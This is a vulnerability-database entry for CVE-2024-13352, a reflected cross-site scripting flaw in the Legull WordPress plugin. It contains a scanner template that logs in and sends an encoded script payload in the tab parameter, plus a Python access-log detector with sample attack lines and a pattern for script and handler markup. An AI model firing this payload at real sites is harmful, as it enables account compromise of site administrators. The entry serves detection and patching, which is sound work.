Legull WordPress - Cross-Site Scripting

CVE-2024-13352
Verified

Description

Legull WordPress plugin <= 1.2.2 contains a reflected cross-site scripting vulnerability caused by unsanitized parameter output. An attacker can execute arbitrary scripts in the context of high-privilege users; exploitation requires the victim to click a malicious link.

Severity

High

CVSS Score

7.1

Exploit Probability

3%

Published Date

February 6, 2026

Template Author

sourabh-sahu

CVE-2024-13352.yaml

id: CVE-2024-13352

info:
  name: Legull WordPress - Cross-Site Scripting
  author: Sourabh-Sahu
  severity: high
  description: |
    Legull WordPress plugin <= 1.2.2 contains a reflected cross-site scripting caused by unsanitized parameter output, letting attackers execute arbitrary scripts in the context of high privilege users, exploit requires victim to click malicious link.
  impact: |
    Attackers can execute arbitrary scripts in the context of high privilege users, potentially leading to account compromise or data theft.
  remediation: |
    Update to the latest version of the plugin where the vulnerability is fixed.
  reference:
    - https://wpscan.com/vulnerability/2c141cc0-f79e-42bd-97a6-98829647104c/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-13352
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
    cvss-score: 7.1
    cve-id: CVE-2024-13352
    cwe-id: CWE-79
    epss-score: 0.02838
    epss-percentile: 0.86384
    cpe: cpe:2.3:a:alwayscurious:legull:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
  tags: cve,cve2024,wordpress,wp-plugin,xss,legull

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to={{RootURL}}/wp-admin/&testcookie=1

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, "wordpress_logged_in")
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=legull_terms&tab=%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cscript%3E` HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "></script><script>alert(document.domain)</script><script>`")
        condition: and
# digest: 4a0a00473045022100debd3422566f8659f86cc6827beb8d428c87c2cbd6547043cb7609a7133a191d02202226fbc6bb785ef257c1bf78d42b5002be1685f4c7793bf8886175eb3109fe6f:922c64590222798bb761d5b6d8e72950
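The template above exercises the flaw from the scanner's side. As an added example that is not part of the original page, the template or the plugin's code, the following Python check works from the defender's side: it reads web server access-log lines (constructed samples, not real traffic) and flags requests to the affected admin page whose tab parameter still carries markup after percent-decoding, including double-encoded variants that a single decode would miss.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines in combined log format (not from the page).
SAMPLE_LOG = """\
10.0.0.5 - - [06/Feb/2026:10:00:01 +0000] "GET /wp-admin/admin.php?page=legull_terms&tab=general HTTP/1.1" 200 5120
10.0.0.7 - - [06/Feb/2026:10:00:02 +0000] "GET /wp-admin/admin.php?page=legull_terms&tab=%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cscript%3E%60 HTTP/1.1" 200 5200
10.0.0.9 - - [06/Feb/2026:10:00:03 +0000] "GET /wp-admin/admin.php?page=legull_terms&tab=%2527%253E%253Cscript%253E HTTP/1.1" 200 5200
10.0.0.9 - - [06/Feb/2026:10:00:04 +0000] "GET /wp-admin/admin.php?page=other&tab=%3Cscript%3E HTTP/1.1" 200 100
"""

# Pull client IP, timestamp, method, request target and status out of one line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Markup or handler fragments that have no business in a tab name.
SUSPICIOUS = re.compile(r"<|>|</?script|javascript:|on\w+\s*=", re.IGNORECASE)


def decode_fully(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded payloads are not missed."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_legull_xss_attempts(log_text: str) -> list[dict]:
    """Return one record per request to page=legull_terms with a suspicious tab value."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        if parts.path != "/wp-admin/admin.php":
            continue
        qs = parse_qs(parts.query, keep_blank_values=True)  # decodes once
        if qs.get("page") != ["legull_terms"]:
            continue
        for raw_tab in qs.get("tab", []):
            tab = decode_fully(raw_tab)
            if SUSPICIOUS.search(tab):
                hits.append({"ip": m["ip"], "ts": m["ts"], "status": m["status"], "tab": tab})
    return hits
```

A 200 response to such a request on an unpatched version is the signal the template's second matcher looks for, so these records are the ones to correlate with the patch status of the plugin.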

CVSS Metrics

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
CVE ID: CVE-2024-13352
CWE ID: CWE-79

References

https://wpscan.com/vulnerability/2c141cc0-f79e-42bd-97a6-98829647104c/
https://nvd.nist.gov/vuln/detail/CVE-2024-13352

Remediation Steps

Update to the latest version of the plugin where the vulnerability is fixed.